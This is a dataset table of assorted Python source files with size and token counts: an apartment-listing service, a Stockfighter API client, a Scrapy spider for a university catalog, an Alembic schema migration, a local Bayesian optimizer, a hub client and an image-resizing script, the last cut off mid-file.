text string | size int64 | token_count int64 |
|---|---|---|
"""
apartmentbot.services.listing_service
"""
import logging
from dataclasses import dataclass
from typing import List
from dataclasses_json import dataclass_json
from apartmentbot.geolocation.geolocation import distance_finder, neighborhood_locator, place_locator
from apartmentbot.models import Listing, Place, Preferences
from apartmentbot.sources.sources import sources
from apartmentbot.repository.repository import listing_repository
@dataclass_json
@dataclass
class ListingService:
    """ Service that searches listing sources and persists apartment listings """
    def find_listings(self, preferences: Preferences) -> List[Listing]:
        """
        Returns every listing that satisfies the given apartment preferences
        :param preferences: A set of apartment preferences
        :return: A list of apartment listings (possibly empty)
        """
        logging.info("Searching listings", extra={"preferences": preferences})
        candidates = self._search_sources(preferences)
        return self._match_additional(preferences, candidates)
    def save_listing(self, listing: Listing):
        """ Persists the listing through the listing repository """
        logging.info("Saving listing", extra={"listing": listing})
        return listing_repository.add(listing)
    @staticmethod
    def _search_sources(preferences: Preferences):
        """ Collects listings from every registered listing site """
        collected = []
        for source in sources:
            collected.extend(source.get_results(preferences))
        return collected
    def _match_additional(self, preferences: Preferences, listings: List[Listing]) -> List[Listing]:
        """ Applies the optional 'additional' preference filters, when present """
        if not preferences.additional:
            return listings
        if preferences.additional.neighborhoods:
            wanted = preferences.additional.neighborhoods
            listings = [candidate for candidate in listings
                        if self._is_in_neighborhood(candidate, wanted)]
            logging.debug('Neighborhood matches: %d', len(listings))
        for place in preferences.additional.places:
            listings = [candidate for candidate in listings
                        if self._is_near_place(candidate, place.name, place.distance)]
            logging.debug('Place matches: %d', len(listings))
        return listings
    @staticmethod
    def _is_in_neighborhood(listing: Listing, neighborhoods: List[str]) -> bool:
        """ Checks the listing location against the wanted neighborhoods; tags the listing on a hit """
        found = neighborhood_locator.find_neighborhood(latlng=listing.geotag)
        logging.debug("Listing neighborhood result: %s", found,
                      extra={"listing_id": listing.id, "geotag": listing.geotag})
        if found not in neighborhoods:
            return False
        listing.neighborhood = found
        return True
    @staticmethod
    def _is_near_place(listing: Listing, place_name: str, max_distance: int) -> bool:
        """ Checks the distance from the listing to a named place; records the place on a hit """
        place = place_locator.find_place(place=place_name, latlng=listing.geotag)
        distance = distance_finder.find_distance(origin=listing.geotag, destination=place)
        logging.debug("Distance (meters) between listing and %s: %d", place_name, distance,
                      extra={"listing_id": listing.id, "place_id": place, "geotag": listing.geotag})
        if distance > max_distance:
            return False
        listing.places.append(Place(place_name, distance))
        return True
| 3,548 | 952 |
import requests
import json
# Root endpoint for every Stockfighter order-book API call below.
BASE_URL = "https://api.stockfighter.io/ob/api/"
class StockMinion(object):
    '''Thin wrapper over the Stockfighter stock/order API for one account, venue and stock'''
    def __init__(self, api_key, account, venue, stock):
        # A Session keeps the HTTP connection alive between calls,
        # avoiding socket setup/teardown for every request.
        self.session = requests.Session()
        # The auth header lives on the session, so every request reuses it.
        self.session.headers.update({'X-Starfighter-Authorization' : api_key})
        # Mostly-static identifiers used to build endpoint URLs.
        self.account = account
        self.venue = venue
        self.stock = stock
    def check_api(self):
        """API-wide heartbeat."""
        return self._call_api(BASE_URL + 'heartbeat', 'get')
    def check_venue(self):
        """Heartbeat for this instance's venue."""
        return self._call_api(BASE_URL + 'venues/{0}/heartbeat'.format(self.venue), 'get')
    def get_stocks_on_venue(self):
        """List the stocks traded on this venue."""
        return self._call_api(BASE_URL + 'venues/{0}/stocks'.format(self.venue), 'get')
    def get_orderbook(self):
        """Fetch the current order book for this venue/stock."""
        return self._call_api(BASE_URL + 'venues/{0}/stocks/{1}'.format(self.venue, self.stock), 'get')
    def place_order(self, **kwargs):
        """Submit an order; callable with keywords or an unpacked dict.

        account/stock/venue are filled in from the instance; the caller must
        supply qty, direction and orderType (price as required by orderType).
        Raises TypeError listing any missing mandatory arguments.
        """
        kwargs['account'] = self.account
        kwargs['stock'] = self.stock
        kwargs['venue'] = self.venue
        # Everything the API requires for an order request.
        mandatory = ['account', 'venue', 'stock', 'qty', 'direction', 'orderType']
        missing_args = [name for name in mandatory if name not in kwargs]
        if missing_args:
            raise TypeError("Missing '{0}' arguments in function call".format(', '.join(missing_args)))
        # kwargs already has the full request shape, so post it as-is.
        return self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders'.format(kwargs['venue'], kwargs['stock']),
                              'post', data=json.dumps(kwargs))
    def get_quote(self):
        """Fetch the latest quote for this venue/stock."""
        return self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/quote'.format(self.venue, self.stock), 'get')
    def get_order_status(self, id):
        """Fetch the status of a single order by id."""
        return self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(self.venue, self.stock, id), 'get')
    def cancel_order(self, id):
        """Cancel a single order by id."""
        return self._call_api(BASE_URL + 'venues/{0}/stocks/{1}/orders/{2}'.format(self.venue, self.stock, id), 'delete')
    def get_all_orders(self, stock=None):
        """List orders for this account: all of them, or just one stock's."""
        if stock:
            return self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/stocks/{2}/orders'.format(self.venue, self.account, stock), 'get')
        return self._call_api(BASE_URL + 'venues/{0}/accounts/{1}/orders'.format(self.venue, self.account), 'get')
    def _call_api(self, url, verb, *args, **kwargs):
        """Dispatch to the Session method named by *verb* and process the reply."""
        method = getattr(self.session, verb)
        response = method(url, *args, **kwargs)
        return StockMinion._process_response(response.text, response.status_code)
    @staticmethod
    def _process_json(json_obj):
        """Parse a JSON payload; on failure print the error and return {}."""
        try:
            return json.loads(json_obj)
        except ValueError as e:
            print(e)
            return {}
    @staticmethod
    def _process_status(code):
        """Warn on any non-200 HTTP status code."""
        if code != 200:
            print("Got a status code of {0}".format(code))
    @staticmethod
    def _process_response(json_obj, code):
        """Decode the response body and report the status code."""
        payload = StockMinion._process_json(json_obj)
        StockMinion._process_status(code)
        return payload
if __name__ == '__main__':
    import sys
    def print_test_result(data, function):
        """Print PASS or FAIL for one smoke-test call based on the API's 'ok' flag."""
        if(data['ok'] == True):
            print("PASS: {0}()".format(function))
        else:
            # BUG FIX: this branch used field index {1} with only one format
            # argument, so every failing test raised IndexError instead of
            # printing FAIL. {0} is the correct (and only) field index.
            print("FAIL: {0}()".format(function))
    # run some simple regression tests
    TEST_VENUE = "TESTEX"
    TEST_STOCK = "FOOBAR"
    TEST_ACCOUNT = "EXB123456"
    # pick up api key from local untracked file
    with open('api.key', 'r') as secret_file:
        API_KEY = secret_file.readlines()[0].rstrip('\n')
    instance = StockMinion(API_KEY, TEST_ACCOUNT, TEST_VENUE, TEST_STOCK)
    data = instance.check_api()
    # the numerous calls to print_test_result can probably be eliminated at some point
    print_test_result(data, 'check_api')
    data = instance.check_venue()
    print_test_result(data, 'check_venue')
    data = instance.get_stocks_on_venue()
    print_test_result(data, 'get_stocks_on_venue')
    data = instance.get_orderbook()
    print_test_result(data, 'get_orderbook')
    data = instance.place_order(qty = 100, direction = "buy", orderType = "limit", price = 100)
    print_test_result(data, 'place_order')
    # NOTE(review): data['id'] raises KeyError if the order was rejected —
    # presumably acceptable for a smoke script, but confirm.
    order_num = data['id']
    data = instance.get_quote()
    print_test_result(data, 'get_quote')
    data = instance.get_order_status(order_num)
    print_test_result(data, 'get_order_status')
    data = instance.cancel_order(order_num)
    print_test_result(data, 'cancel_order')
    data = instance.get_all_orders()
    print_test_result(data, 'get_all_orders')
    data = instance.get_all_orders(TEST_STOCK)
    print_test_result(data, 'get_all_orders')
| 6,016 | 1,884 |
# Print the numbers 0 through 3, one per line, then a greeting.
for counter in range(4):
    print(counter)
print("Hello world")
| 54 | 22 |
# -*- coding: utf-8 -*-
import scrapy
import os
from ucsc.items import FacultyItem, ProgramStatementItem, CourseDescriptionItem
def path_components (path):
    """Return the non-empty path segments of *path*, ignoring any scheme prefix
    and empty segments produced by leading/trailing slashes."""
    if '://' in path:
        path = path.split('://')[1]
    segments = path.split('/')
    start, stop = 0, len(segments)
    # Trim empty segments caused by leading slashes...
    while start < stop and segments[start] == '':
        start += 1
    # ...and by trailing slashes. Interior empty segments are kept.
    while stop > start and segments[stop - 1] == '':
        stop -= 1
    return segments[start:stop]
assert(path_components('') == [])
assert(path_components('/') == [])
assert(path_components('foo/') == ['foo'])
assert(path_components('/bar') == ['bar'])
assert(path_components('foo/bar') == ['foo','bar'])
def merge_url (url, rel):
    """Resolve the relative path *rel* against *url*; '..' pops one segment.
    Falls back to the https scheme when *url* carries none."""
    scheme = url.split('://')[0] if '://' in url else 'https'
    if url and url[-1] == '/':
        base = path_components(url)
    else:
        # A non-directory URL resolves relative to its parent.
        base = path_components(url)[:-1]
    for segment in path_components(rel):
        if segment == '..':
            base = base[:-1]
        else:
            base.append(segment)
    return scheme + '://' + '/'.join(base)
assert(merge_url('https://registrar.ucsc.edu/catalog/programs-courses/index.html',
    '../foo/bar/../baz.html') == 'https://registrar.ucsc.edu/catalog/foo/baz.html')
assert(merge_url('', 'bar.baz') == 'https://bar.baz')
assert(merge_url('https://foo/bar/baz.html', '') == 'https://foo/bar')
# Root of the registrar catalog section; every crawled page lives beneath it.
registrar_base_url = 'https://registrar.ucsc.edu/catalog/programs-courses'
# URL prefixes used by the spider to classify a crawled page by content type.
base_course_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions'
base_faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty'
base_program_description_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements'
class RegistrarCoursesSpider(scrapy.Spider):
    """Crawls the UCSC registrar catalog, classifying pages by URL prefix and
    following every link that stays inside the catalog section."""
    name = 'registrar_courses'
    allowed_domains = ['registrar.ucsc.edu']
    start_urls = [merge_url(registrar_base_url, 'index.html')]
    def __init__(self, *args, **kwargs):
        super(RegistrarCoursesSpider, self).__init__(*args, **kwargs)
        # URLs already queued or visited, to avoid re-crawling them.
        self.crawled = set()
    def parse (self, response):
        """Classify the current page (yielding an item), then follow links."""
        print("Parsing %s"%response.url)
        # Dispatch on URL prefix: course / faculty / program-statement pages
        # each produce their own item type.
        if base_course_description_url in response.url:
            yield self.parse_course_info(response)
        elif base_faculty_url in response.url:
            yield self.parse_faculty_info(response)
        elif base_program_description_url in response.url:
            yield self.parse_program_info(response)
        all_links = response.xpath('//a')
        for link in all_links:
            #print("Got link: %s"%link.extract())
            try:
                href = link.xpath('@href').extract()[0]
                def is_local_url (url):
                    # Heuristic: hrefs without a scheme/host marker are
                    # treated as relative links within the registrar site.
                    for thing in ('http:','https:','C:','www','ucsc.edu'):
                        if thing in url:
                            return False
                    return True
                url = merge_url(response.url, href) if is_local_url(href) else href
                if url in self.crawled:
                    continue
                #print("Got URL: %s"%url)
                self.crawled.add(url)
                # Only follow links that stay inside the catalog section.
                if registrar_base_url in url:
                    yield { 'url': url }
                    yield scrapy.Request(url, self.parse)
                else:
                    pass
                    #print("Skipping %s"%url)
            except IndexError:
                # <a> element without an href attribute — ignore it.
                pass
    def parse_course_info (self, response):
        """Build a CourseDescriptionItem stub for a course-description page."""
        info = CourseDescriptionItem()
        info['url'] = response.url
        print("Got %s"%response.url)
        return info
    def parse_faculty_info (self, response):
        """Build a FacultyItem stub for a faculty page."""
        info = FacultyItem()
        info['url'] = response.url
        print("Got %s"%response.url)
        return info
    def parse_program_info (self, response):
        """Build a ProgramStatementItem stub for a program-statement page."""
        info = ProgramStatementItem()
        info['url'] = response.url
        print("Got %s"%response.url)
        return info
class Unused:
    # NOTE(review): dead legacy code — never instantiated in this file;
    # presumably an earlier spider implementation kept for reference. Confirm
    # before deleting.
    def parse(self, response):
        """Legacy parse: walk the catalog index table and request per-department pages."""
        # Get links to all course pages from the registrar
        page_content = response\
            .xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\
            .xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]')
        panel_elems = page_content.xpath('table/tbody/tr/td')
        # dept code -> display title, plus URLs already requested.
        self.depts = {}
        self.crawled = set()
        for panel in panel_elems:
            program_statements = panel.xpath('p/a')
            for a in program_statements:
                # print(a.xpath('@href').extract())
                dept = a.xpath('@href').re(r'program-statements/(\w+)\.html')[0]
                title = a.xpath('text()').extract()[0]
                url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept
                self.depts[dept] = title
                self.crawled.add(url)
                yield scrapy.Request(url, callback=self.parse_program_info)
                #course_url = 'https://registrar.ucsc.edu/catalog/programs-courses/course-descriptions/%s.html'%dept
                # NOTE(review): program_url is identical to `url` above, so the
                # same page is requested twice — scrapy normally de-dupes, but
                # confirm this was intended.
                program_url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s.html'%dept
                faculty_url = 'https://registrar.ucsc.edu/catalog/programs-courses/faculty/%s.html'%dept
                #yield scrapy.Request(course_url, callback=self.parse_course_info)
                yield scrapy.Request(program_url, callback=self.parse_program_info)
                yield scrapy.Request(faculty_url, callback=self.parse_faculty_info)
    def parse_program_info (self, response):
        """Legacy: extract linked sub-pages from a program-statement page (print only)."""
        page_content = response\
            .xpath('body/div[@id="wrap"]/div[@id="container"]/div[@id="content"]')\
            .xpath('div[@id="sprflt"]/div[@id="main"]/div[contains(@class,"content")]')
        page_links = page_content.xpath('p[3]/a')
        for a in page_links:
            href, regex = a.xpath('@href'), r'\.\./([\w\-]+/\w+\.html)'
            try:
                page = href.re(regex)[0]
                title = a.xpath('text()').extract()[0]
                url = 'https://registrar.ucsc.edu/catalog/programs-courses/program-statements/%s'%page
                print("\n%s: %s"%(url, title))
            except IndexError:
                # Link that does not match the relative-page pattern.
                print("Could not match '%s' with '%s'"%(href, regex))
        content = page_content
        #print("%s"%content.extract()[0])
    def parse_course_info (self, response):
        """Legacy stub: log the crawled course page."""
        print("Got %s"%response.url)
    def parse_faculty_info (self, response):
        """Legacy stub: log the crawled faculty page."""
        print("Got %s"%response.url)
| 6,481 | 2,022 |
"""Refactor datetime fields
Revision ID: 0e7bdd5c7473
Revises:
Create Date: 2020-05-10 17:28:07.620112
"""
import enum
from alembic import op
import sqlalchemy as sa
from sqlalchemy_utils import ChoiceType
from sqlalchemy_utils import URLType
from yui.apps.info.toranoana.models import Stock
from yui.apps.info.toranoana.models import Target
from yui.orm.types import JSONType
from yui.orm.types import TimezoneType
# revision identifiers, used by Alembic.
revision = '0e7bdd5c7473'
down_revision = None  # first migration in the chain (no parent revision)
branch_labels = None
depends_on = None
@enum.unique
class Server(enum.IntEnum):
    # Intentionally empty snapshot used by the saomd_notice 'server'
    # ChoiceType column below; member values are not needed to emit the DDL.
    # NOTE(review): presumably mirrors a since-removed app-level enum — confirm.
    pass
def upgrade():
    """Create the initial schema: event/cache/memo/rss tables, saomd_notice,
    and the toranoana catalog (lookup tables, items, M2M link tables).

    Parent tables are created before the tables whose foreign keys reference
    them; datetime values are stored as a tz-aware timestamp plus a separate
    original-timezone column (the refactor this migration is named after).
    """
    op.create_table(
        'event_log',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('ts', sa.String(), nullable=False),
        sa.Column('channel', sa.String(), nullable=False),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table(
        'json_cache',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.Column('body', JSONType(), nullable=True),
        sa.Column(
            'created_datetime', sa.DateTime(timezone=True), nullable=False
        ),
        sa.Column('created_timezone', TimezoneType(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('name'),
    )
    op.create_table(
        'memo',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('keyword', sa.String(), nullable=False),
        sa.Column('text', sa.Text(), nullable=False),
        sa.Column('author', sa.String(), nullable=False),
        sa.Column(
            'created_datetime', sa.DateTime(timezone=True), nullable=False
        ),
        sa.Column('created_timezone', TimezoneType(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table(
        'rss_feed_url',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('url', sa.String(), nullable=False),
        sa.Column('channel', sa.String(), nullable=False),
        sa.Column(
            'updated_datetime', sa.DateTime(timezone=True), nullable=False
        ),
        sa.Column('updated_timezone', TimezoneType(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    # 'server' stores members of the (locally snapshotted) Server enum.
    op.create_table(
        'saomd_notice',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('notice_id', sa.Integer(), nullable=False),
        sa.Column(
            'server', ChoiceType(Server, impl=sa.Integer()), nullable=False
        ),
        sa.Column('title', sa.String(), nullable=False),
        sa.Column('duration', sa.String(), nullable=True),
        sa.Column('short_description', sa.String(), nullable=True),
        sa.Column('is_deleted', sa.Boolean(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    # Toranoana lookup tables (code/name, some with a Korean display name).
    op.create_table(
        'toranoana_author',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.String(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table(
        'toranoana_character',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.String(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.Column('name_ko', sa.String(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table(
        'toranoana_circle',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.String(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table(
        'toranoana_coupling',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.String(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.Column('name_ko', sa.String(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table(
        'toranoana_genre',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.String(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.Column('name_ko', sa.String(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    op.create_table(
        'toranoana_tag',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.String(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.Column('name_ko', sa.String(), nullable=True),
        sa.PrimaryKeyConstraint('id'),
    )
    # Main item table; references toranoana_genre created above.
    op.create_table(
        'toranoana_item',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('code', sa.String(), nullable=False),
        sa.Column('title', sa.String(), nullable=False),
        sa.Column('image_url', URLType(), nullable=False),
        sa.Column('price', sa.Integer(), nullable=False),
        sa.Column(
            'stock', ChoiceType(Stock, impl=sa.Integer()), nullable=False
        ),
        sa.Column('genre_id', sa.Integer(), nullable=False),
        sa.Column(
            'male_target',
            ChoiceType(Target, impl=sa.Integer()),
            nullable=False,
        ),
        sa.Column(
            'female_target',
            ChoiceType(Target, impl=sa.Integer()),
            nullable=False,
        ),
        sa.Column(
            'checked_datetime', sa.DateTime(timezone=True), nullable=False
        ),
        sa.Column('checked_timezone', TimezoneType(), nullable=True),
        sa.Column(
            'updated_datetime', sa.DateTime(timezone=True), nullable=False
        ),
        sa.Column('updated_timezone', TimezoneType(), nullable=True),
        sa.Column('is_deleted', sa.Boolean(), nullable=False),
        sa.ForeignKeyConstraint(
            ['genre_id'],
            ['toranoana_genre.id'],
        ),
        sa.PrimaryKeyConstraint('id'),
        sa.UniqueConstraint('code'),
    )
    op.create_table(
        'toranoana_watch',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('print_target_id', sa.String(), nullable=False),
        sa.Column('genre_id', sa.Integer(), nullable=True),
        sa.Column(
            'male', ChoiceType(Target, impl=sa.Integer()), nullable=False
        ),
        sa.Column(
            'female', ChoiceType(Target, impl=sa.Integer()), nullable=False
        ),
        sa.ForeignKeyConstraint(
            ['genre_id'],
            ['toranoana_genre.id'],
        ),
        sa.PrimaryKeyConstraint('id'),
    )
    # Many-to-many link tables between items and the lookup tables.
    op.create_table(
        'toranoana_itemauthor',
        sa.Column('item_id', sa.Integer(), nullable=False),
        sa.Column('author_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(
            ['author_id'],
            ['toranoana_author.id'],
        ),
        sa.ForeignKeyConstraint(
            ['item_id'],
            ['toranoana_item.id'],
        ),
        sa.PrimaryKeyConstraint('item_id', 'author_id'),
    )
    op.create_table(
        'toranoana_itemcharacter',
        sa.Column('item_id', sa.Integer(), nullable=False),
        sa.Column('character_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(
            ['character_id'],
            ['toranoana_character.id'],
        ),
        sa.ForeignKeyConstraint(
            ['item_id'],
            ['toranoana_item.id'],
        ),
        sa.PrimaryKeyConstraint('item_id', 'character_id'),
    )
    op.create_table(
        'toranoana_itemcircle',
        sa.Column('item_id', sa.Integer(), nullable=False),
        sa.Column('circle_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(
            ['circle_id'],
            ['toranoana_circle.id'],
        ),
        sa.ForeignKeyConstraint(
            ['item_id'],
            ['toranoana_item.id'],
        ),
        sa.PrimaryKeyConstraint('item_id', 'circle_id'),
    )
    op.create_table(
        'toranoana_itemcoupling',
        sa.Column('item_id', sa.Integer(), nullable=False),
        sa.Column('coupling_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(
            ['coupling_id'],
            ['toranoana_coupling.id'],
        ),
        sa.ForeignKeyConstraint(
            ['item_id'],
            ['toranoana_item.id'],
        ),
        sa.PrimaryKeyConstraint('item_id', 'coupling_id'),
    )
    op.create_table(
        'toranoana_itemtag',
        sa.Column('item_id', sa.Integer(), nullable=False),
        sa.Column('tag_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(
            ['item_id'],
            ['toranoana_item.id'],
        ),
        sa.ForeignKeyConstraint(
            ['tag_id'],
            ['toranoana_tag.id'],
        ),
        sa.PrimaryKeyConstraint('item_id', 'tag_id'),
    )
def downgrade():
    """Drop every table created by upgrade(), children before their parents."""
    tables_in_drop_order = (
        'toranoana_itemtag',
        'toranoana_itemcoupling',
        'toranoana_itemcircle',
        'toranoana_itemcharacter',
        'toranoana_itemauthor',
        'toranoana_watch',
        'toranoana_item',
        'toranoana_tag',
        'toranoana_genre',
        'toranoana_coupling',
        'toranoana_circle',
        'toranoana_character',
        'toranoana_author',
        'saomd_notice',
        'rss_feed_url',
        'memo',
        'json_cache',
        'event_log',
    )
    for table_name in tables_in_drop_order:
        op.drop_table(table_name)
| 9,528 | 2,988 |
# Author: Simon Blanke
# Email: simon.blanke@yahoo.com
# License: MIT License
import time
import random
import numpy as np
from ..base_optimizer import BaseOptimizer
from ...search import Search
from ._sub_search_spaces import SubSearchSpaces
from ..smb_opt import BayesianOptimizer
class LocalBayesianOptimizer(BaseOptimizer, Search):
    """Bayesian optimization restricted to a moving local window.

    Runs an inner BayesianOptimizer on a sub-search-space of +/- ``local_range``
    positions around the current position, and re-centers that window every
    ``n_positions`` iterations.
    """
    name = "Local Bayesian Optimizer"
    def __init__(
        self, *args, max_size=300000, n_positions=20, local_range=100, **kwargs
    ):
        super().__init__(*args, **kwargs)
        self.max_size = max_size
        self.n_positions = n_positions
        self.local_range = local_range
        # Start with the full search space until the first window is built.
        self.bayes_opt = BayesianOptimizer(self.conv.search_space)
    def create_local_smbo(self, current_position):
        """Rebuild the inner optimizer on a window around *current_position*."""
        local_ss = {}
        for idx, para in enumerate(self.conv.para_names):
            # BUG FIX: the clamps were swapped — the original computed
            # max(0, pos + range) and min(dim_size, pos - range), both of
            # which are no-ops, so the window was never clamped to the valid
            # position range. Clamp the lower bound at 0 and the upper bound
            # at the dimension size instead.
            min_dim = max(0, current_position[idx] - self.local_range)
            max_dim = min(
                self.conv.dim_sizes[idx], current_position[idx] + self.local_range
            )
            dim_pos = np.array(self.conv.search_space_positions[idx])
            # Indices of the positions that fall inside the clamped window.
            dim_pos_center = np.where(
                np.logical_and(dim_pos >= min_dim, dim_pos <= max_dim)
            )[0]
            local_ss[para] = dim_pos_center
        self.bayes_opt = BayesianOptimizer(local_ss)
    def finish_initialization(self):
        # Center the first local window on the current position.
        self.create_local_smbo(self.pos_current)
    @BaseOptimizer.track_nth_iter
    def iterate(self):
        """Propose the next position via the local Bayesian optimizer."""
        pos_loc = self.bayes_opt.iterate()
        pos_new = self.bayes_opt.conv.position2value(pos_loc)
        return pos_new
    def evaluate(self, score_new):
        """Feed the score back and periodically re-center the local window."""
        self.bayes_opt.evaluate(score_new)
        self.score_new = score_new
        self._evaluate_new2current(score_new)
        self._evaluate_current2best()
        # Re-center the window on every n_positions-th iteration.
        if self.nth_iter % self.n_positions == 0:
            self.create_local_smbo(self.pos_current)
| 1,937 | 649 |
import psutil
from appJar import gui
import config
import requests as req
import json
import platform
import sysInfo
# Single appJar window shared by the whole hub UI.
app = gui(title="CMM Hub", showIcon=False)
# Registered navigation-bar entries and their call names.
# NOTE(review): populated elsewhere — presumably by UI-building code outside
# this excerpt; confirm.
navBarElements = []
navBarElementsCallName = []
# Name of the container currently being displayed.
currentContainer = ""
def get_size(bytes, suffix="B"):
    """
    Scale bytes to its proper format
    e.g:
        1253656 => '1.20MB'
        1253656678 => '1.17GB'
    """
    # NOTE: the parameter shadows the builtin `bytes`; kept for
    # backward compatibility with keyword callers.
    factor = 1024
    for unit in ["", "K", "M", "G", "T", "P"]:
        if bytes < factor:
            return f"{bytes:.2f}{unit}{suffix}"
        bytes /= factor
    # BUG FIX: values of one exabyte and above fell through the loop and
    # returned None; report them in exabytes instead.
    return f"{bytes:.2f}E{suffix}"
def getServerInfo():
    """Fetch /api/info from the configured server; returns {} on failure."""
    response = req.get(config.getServerAddress() + "/api/info", verify=False)
    if response.status_code != 200:
        return {}
    return json.loads(response.text)
def getUserInfo():
    """Fetch the current user record using the stored device secret; {} on failure."""
    response = req.get(config.getServerAddress() + "/api/user/currentUser", verify=False,
                       params={"devicesecret": config.getDeviceSecret()})
    if response.status_code != 200:
        return {}
    return json.loads(response.text)
def getInstallableModules():
    """Fetch the CSV module list advertised by the server.

    Each line of the remote file is expected as: name, link, version.
    Returns a dict keyed by module name, or {} when the list cannot be
    fetched (consistent with getServerInfo/getUserInfo).
    """
    serverInfo = getServerInfo()
    moduleListURL = serverInfo["moduleListURL"]
    request = req.get(moduleListURL, verify=False)
    if request.status_code != 200:
        # BUG FIX: previously fell through and returned None on failure,
        # unlike the sibling helpers which return {}.
        return {}
    modules = {}
    for line in request.text.split('\n'):
        elements = line.split(',')
        # BUG FIX: skip blank or malformed lines (e.g. a trailing newline)
        # instead of raising IndexError on elements[1]/elements[2].
        if len(elements) < 3:
            continue
        name = elements[0]
        modules[name] = {
            "link": elements[1].replace(" ", ""),
            "name": name.capitalize(),
            "version": elements[2].replace(" ", ""),
        }
    return modules
def getDeviceInfo():
    """Collect basic OS, CPU and RAM facts about this machine."""
    uname = platform.uname()
    mem = psutil.virtual_memory()
    deviceInfo = {
        "os": uname.system + str(uname.release),
        "name": uname.node,
        "architecture": uname.machine,
        "processor": {
            "processor Declaration": uname.processor,
            "cores": psutil.cpu_count(logical=False),
            "threads": psutil.cpu_count(logical=True),
        },
        "installed RAM": get_size(mem.total),
    }
    return deviceInfo
| 2,235 | 713 |
name0_1_0_1_0_4_0 = None
name0_1_0_1_0_4_1 = None
name0_1_0_1_0_4_2 = None
name0_1_0_1_0_4_3 = None
name0_1_0_1_0_4_4 = None
#!/usr/bin/python3
import cv2
import numpy as np
import sys
import os
import pickle
import datetime
import base64
import io
from matplotlib import pyplot as plt
from PIL import Image
import extract_feature
# x = np.random.randint(25,100,25)
# y = np.random.randint(175,255,25)
# z = np.hstack((x,y))
# z = z.reshape((50,1))
# z = np.float32(z)
# # plt.hist(z,256,[0,256]),plt.show()
# # Define criteria = ( type, max_iter = 10 , epsilon = 1.0 )
# criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# # Set flags (Just to avoid line break in the code)
# flags = cv2.KMEANS_RANDOM_CENTERS
# # Apply KMeans
# compactness,labels,centers = cv2.kmeans(z,2,None,criteria,10,flags)
# A = z[labels==0]
# B = z[labels==1]
# # Now plot 'A' in red, 'B' in blue, 'centers' in yellow
# plt.hist(A,256,[0,256],color = 'r')
# plt.hist(B,256,[0,256],color = 'b')
# plt.hist(centers,32,[0,256],color = 'y')
# plt.show()
# img = cv2.imread('C:\\Users\\yagor\\extrator-caracteristicas\\banco_imagens\\Parthenon\\spencer-davis-1533814-unsplash.jpg', cv2.COLOR_BGR2RGB)
# # blur = cv2.bilateralFilter(img,9,500,500)
# cinza = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# canny = cv2.Canny(cinza, 150,150)
# plt.subplot(121),plt.imshow(img)
# plt.title('Imagem original'), plt.xticks([]), plt.yticks([])
# plt.subplot(122),plt.imshow(canny)
# plt.title('Imagem filtrada'), plt.xticks([]), plt.yticks([])
# plt.show()
# Collect every landmark image, square it, shrink it to fit 300x300, and save
# a PNG copy in the mirrored banco_imagens_sqr tree.
imagens = extract_feature.ler_diretorio_imagens("banco_imagens/Colosseum")
imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Eiffel")
imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Louvre")
imagens += extract_feature.ler_diretorio_imagens("banco_imagens/Parthenon")
size = 300, 300
for imagem in imagens:
    real_img = Image.open(imagem)
    sqr_img = extract_feature.make_square(real_img)
    # BUG FIX: Image.ANTIALIAS was removed in Pillow 10; Image.LANCZOS has
    # been the canonical name for the same filter since Pillow 2.7.
    sqr_img.thumbnail(size, Image.LANCZOS)
    destino = imagem.replace('banco_imagens', 'banco_imagens_sqr').replace('.jpg', '.png')
    # Make sure the mirror directory exists before saving.
